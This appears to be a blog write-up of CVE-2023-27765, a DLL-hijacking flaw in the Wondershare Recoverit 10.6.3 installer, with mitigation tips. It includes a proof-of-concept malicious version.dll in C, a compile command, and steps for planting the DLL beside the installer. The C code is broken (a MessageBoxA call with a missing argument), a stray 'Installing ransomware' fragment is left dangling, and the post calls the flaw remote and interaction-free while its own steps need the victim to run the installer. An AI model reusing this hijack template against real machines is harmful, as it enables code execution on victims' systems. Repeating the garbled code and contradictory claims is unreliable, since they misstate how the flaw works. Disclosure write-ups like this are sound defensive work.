In March 2023, security researchers discovered a severe security issue in Wondershare Recoverit (version 10.6.3), a popular data recovery tool developed by Wondershare Technology Co., Ltd. This vulnerability, tracked as CVE-2023-27765, enables remote attackers to execute arbitrary commands on a user's Windows machine. The vulnerability specifically impacts users when running the installer file, recoverit_setup_full4134.exe, making even initial installations risky if the installer is compromised.
In this post, we'll break down what this bug is, how it works, show a simplified proof-of-concept exploit, and offer guidance for protecting yourself if you use Wondershare products.
What’s the Issue? (Technical Summary)
The core problem resides in how the Recoverit v10.6.3 installer loads DLL files. When recoverit_setup_full4134.exe is run by a Windows user, the program looks for some Windows system libraries (DLLs) in its own directory before the proper system folders. This is known as “DLL hijacking.” In practice, a remote attacker can trick a user into running a malicious DLL of their choosing—leading to code execution with the rights of the user who runs the installer.
Why is This Serious?
- Remote exploitability: An attacker could send a malicious DLL and the Recoverit installer to a victim (e.g., via email, drive-by download, or supply chain tricks).
- No user interaction needed: If the DLL is in the same folder as the installer, launching the EXE steps right into the trap.
- Impacts fresh installs: Even if you download and run an official installer, if it shares a folder with a malicious DLL, you’re at risk.
Proof-of-Concept: DLL Hijacking Example
Warning: This is for educational purposes only. Do not use for unauthorized access.
Step 1: Attacker Creates a Malicious DLL
Let’s say the Recoverit installer loads version.dll. An attacker writes a simple malicious version.
Here's a very basic example of a malicious DLL in C
// malicious_version.c
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
MessageBoxA(, "Hacked via CVE-2023-27765!", "DLL Hijack", MB_OK);
system("powershell -Command \"Start-Process notepad.exe\""); // Pops notepad just for demo
return TRUE;
}
Compile this to version.dll
x86_64-w64-mingw32-gcc -shared -o version.dll malicious_version.c
Step 2: Attacker Shares Files
The attacker puts both recoverit_setup_full4134.exe and version.dll into one folder, maybe sending it to a victim or hosting it online.
/shared-folder/
recoverit_setup_full4134.exe
version.dll (malicious)
Step 3: Victim Runs the Installer
The victim runs recoverit_setup_full4134.exe. Because the installer looks for version.dll in its own folder (before the Windows folder), it loads the attacker’s DLL—which now runs whatever code the attacker wants.
Result: Arbitrary commands executed on the system.
Installing ransomware
All that’s needed is for an attacker to trick the victim into running the installer in the same directory as the attacker's DLL (for example, in an extracted ZIP file, or a compromised download).
References and Official Sources
- NVD Detail - CVE-2023-27765
- Exploit DB: Wondershare Recoverit 10.6.3 - Installer DLL Hijacking
- Original Disclosure: github.com/r4jx00/exploits/tree/main/CVE-2023-27765
How to Protect Yourself
* Always download software directly from the vendor website.
* Never run unknown EXE and DLL files in the same location.
* Upgrade! If you’re using Wondershare Recoverit, update to the latest version. (Wondershare has issued a fix in later releases.)
* Use Windows Defender or similar to scan unpacked downloads and folders.
* Don’t open ZIP files or software installers sent by email, especially from unknown sources.
Final Thoughts
CVE-2023-27765 is a great example of why “DLL hijacking” is such a persistent security issue on Windows. Even big-name software like Wondershare Recoverit can be an attack vector if the installer isn’t careful about what it loads. Stay watchful, be careful where you download from, and keep your software up to date!
For more details on this and other Windows security weaknesses, check out the references above.
Timeline
Published on: 04/04/2023 15:15:00 UTC
Last modified on: 04/11/2023 20:53:00 UTC